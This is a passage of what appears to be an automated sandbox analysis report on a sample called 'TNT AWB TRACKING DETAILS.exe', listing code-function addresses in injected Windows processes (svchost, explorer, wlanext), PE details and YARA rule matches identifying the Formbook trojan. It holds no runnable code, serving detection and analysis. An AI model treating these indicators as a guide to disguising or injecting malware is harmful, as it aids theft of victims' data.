          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C6E02_2_0345C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034405352_2_03440535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035005912_2_03500591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F24462_2_034F2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E44202_2_034E4420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EE4F62_2_034EE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB402_2_034FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F6BD72_2_034F6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA802_2_0343EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034569622_2_03456962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A02_2_034429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350A9A62_2_0350A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344A8402_2_0344A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034428402_2_03442840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E8F02_2_0346E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034268B82_2_034268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4F402_2_034B4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03482F282_2_03482F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460F302_2_03460F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E2F302_2_034E2F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432FC82_2_03432FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344CFE02_2_0344CFE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BEFA02_2_034BEFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440E592_2_03440E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEE262_2_034FEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEEDB2_2_034FEEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452E902_2_03452E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FCE932_2_034FCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344AD002_2_0344AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DCD1F2_2_034DCD1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343ADE02_2_0343ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03458DBF2_2_03458DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440C002_2_03440C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430CF22_2_03430CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0CB52_2_034E0CB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342D34C2_2_0342D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F132D2_2_034F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0348739A2_2_0348739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B2C02_2_0345B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E12ED2_2_034E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034452A02_2_034452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347516C2_2_0347516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342F1722_2_0342F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350B16B2_2_0350B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344B1B02_2_0344B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EF0CC2_2_034EF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034470C02_2_034470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F70E92_2_034F70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF0E02_2_034FF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF7B02_2_034FF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034856302_2_03485630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F16CC2_2_034F16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F75712_2_034F7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035095C32_2_035095C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DD5B02_2_034DD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034314602_2_03431460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF43F2_2_034FF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFB762_2_034FFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B5BF02_2_034B5BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347DBF92_2_0347DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FB802_2_0345FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFA492_2_034FFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7A462_2_034F7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B3A6C2_2_034B3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EDAC62_2_034EDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DDAAC2_2_034DDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03485AA02_2_03485AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E1AA32_2_034E1AA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034499502_2_03449950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B9502_2_0345B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D59102_2_034D5910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AD8002_2_034AD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034438E02_2_034438E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFF092_2_034FFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03441F922_2_03441F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFFB12_2_034FFFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03449EB02_2_03449EB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03443D402_2_03443D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F1D5A2_2_034F1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7D732_2_034F7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FDC02_2_0345FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B9C322_2_034B9C32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFCF22_2_034FFCF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384A0362_2_0384A036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384B2322_2_0384B232
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038410822_2_03841082
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E5CD2_2_0384E5CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03845B302_2_03845B30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03845B322_2_03845B32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038489122_2_03848912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03842D022_2_03842D02
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1B5B323_2_0B1B5B32
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1B5B303_2_0B1B5B30
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1BB2323_2_0B1BB232
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1B89123_2_0B1B8912
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1B2D023_2_0B1B2D02
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1BE5CD3_2_0B1BE5CD
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1BA0363_2_0B1BA036
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1B10823_2_0B1B1082
          Source: C:\Windows\explorer.exeCode function: 3_2_10C712323_2_10C71232
          Source: C:\Windows\explorer.exeCode function: 3_2_10C670823_2_10C67082
          Source: C:\Windows\explorer.exeCode function: 3_2_10C700363_2_10C70036
          Source: C:\Windows\explorer.exeCode function: 3_2_10C745CD3_2_10C745CD
          Source: C:\Windows\explorer.exeCode function: 3_2_10C68D023_2_10C68D02
          Source: C:\Windows\explorer.exeCode function: 3_2_10C6E9123_2_10C6E912
          Source: C:\Windows\explorer.exeCode function: 3_2_10C6BB323_2_10C6BB32
          Source: C:\Windows\explorer.exeCode function: 3_2_10C6BB303_2_10C6BB30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039A03E64_2_039A03E6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038EE3F04_2_038EE3F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0399A3524_2_0399A352
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039602C04_2_039602C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039802744_2_03980274
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039A01AA4_2_039A01AA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039941A24_2_039941A2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039981CC4_2_039981CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038D01004_2_038D0100
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0397A1184_2_0397A118
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039681584_2_03968158
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039720004_2_03972000
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038DC7C04_2_038DC7C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039047504_2_03904750
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038E07704_2_038E0770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038FC6E04_2_038FC6E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039A05914_2_039A0591
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038E05354_2_038E0535
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0398E4F64_2_0398E4F6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039844204_2_03984420
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039924464_2_03992446
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03996BD74_2_03996BD7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0399AB404_2_0399AB40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038DEA804_2_038DEA80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038E29A04_2_038E29A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039AA9A64_2_039AA9A6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038F69624_2_038F6962
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038C68B84_2_038C68B8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0390E8F04_2_0390E8F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038E28404_2_038E2840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038EA8404_2_038EA840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0395EFA04_2_0395EFA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038D2FC84_2_038D2FC8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038ECFE04_2_038ECFE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03900F304_2_03900F30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03982F304_2_03982F30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03922F284_2_03922F28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03954F404_2_03954F40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0399CE934_2_0399CE93
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038F2E904_2_038F2E90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0399EEDB4_2_0399EEDB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0399EE264_2_0399EE26
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038E0E594_2_038E0E59
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038F8DBF4_2_038F8DBF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038DADE04_2_038DADE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0397CD1F4_2_0397CD1F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038EAD004_2_038EAD00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03980CB54_2_03980CB5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038D0CF24_2_038D0CF2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038E0C004_2_038E0C00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0392739A4_2_0392739A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0399132D4_2_0399132D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038CD34C4_2_038CD34C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038E52A04_2_038E52A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038FB2C04_2_038FB2C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039812ED4_2_039812ED
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038EB1B04_2_038EB1B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039AB16B4_2_039AB16B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0391516C4_2_0391516C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038CF1724_2_038CF172
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038E70C04_2_038E70C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0398F0CC4_2_0398F0CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039970E94_2_039970E9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0399F0E04_2_0399F0E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0399F7B04_2_0399F7B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039916CC4_2_039916CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039256304_2_03925630
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0397D5B04_2_0397D5B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039A95C34_2_039A95C3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039975714_2_03997571
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0399F43F4_2_0399F43F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038D14604_2_038D1460
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038FFB804_2_038FFB80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03955BF04_2_03955BF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0391DBF94_2_0391DBF9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0399FB764_2_0399FB76
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03925AA04_2_03925AA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0397DAAC4_2_0397DAAC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03981AA34_2_03981AA3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0398DAC64_2_0398DAC6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0399FA494_2_0399FA49
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03997A464_2_03997A46
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03953A6C4_2_03953A6C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039759104_2_03975910
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038E99504_2_038E9950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038FB9504_2_038FB950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038E38E04_2_038E38E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0394D8004_2_0394D800
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038E1F924_2_038E1F92
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0399FFB14_2_0399FFB1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038A3FD24_2_038A3FD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038A3FD54_2_038A3FD5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0399FF094_2_0399FF09
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038E9EB04_2_038E9EB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038FFDC04_2_038FFDC0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03991D5A4_2_03991D5A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_038E3D404_2_038E3D40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03997D734_2_03997D73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0399FCF24_2_0399FCF2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03959C324_2_03959C32
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_030EE61E4_2_030EE61E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_030EE6394_2_030EE639
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_030D2FB04_2_030D2FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_030D9E1A4_2_030D9E1A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_030D9E604_2_030D9E60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_030EEE604_2_030EEE60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_030D2D884_2_030D2D88
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_030D2D904_2_030D2D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0368A0364_2_0368A036
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03685B304_2_03685B30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03685B324_2_03685B32
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0368B2324_2_0368B232
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_036889124_2_03688912
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_036810824_2_03681082
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03682D024_2_03682D02
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0368E5CD4_2_0368E5CD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0394EA12 appears 86 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 03927E54 appears 110 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 006F650B appears 96 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0395F290 appears 105 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 038CB970 appears 280 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 03915130 appears 58 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B970 appears 280 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475130 appears 58 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487E54 appears 110 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BF290 appears 105 times
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: String function: 004115D7 appears 36 times
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: String function: 00416C70 appears 39 times
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: String function: 00445AE0 appears 65 times
          Source: TNT AWB TRACKING DETAILS.exe, 00000000.00000003.1450642019.000000000467D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TNT AWB TRACKING DETAILS.exe
          Source: TNT AWB TRACKING DETAILS.exe, 00000000.00000003.1449263354.00000000044D3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TNT AWB TRACKING DETAILS.exe
          Source: TNT AWB TRACKING DETAILS.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
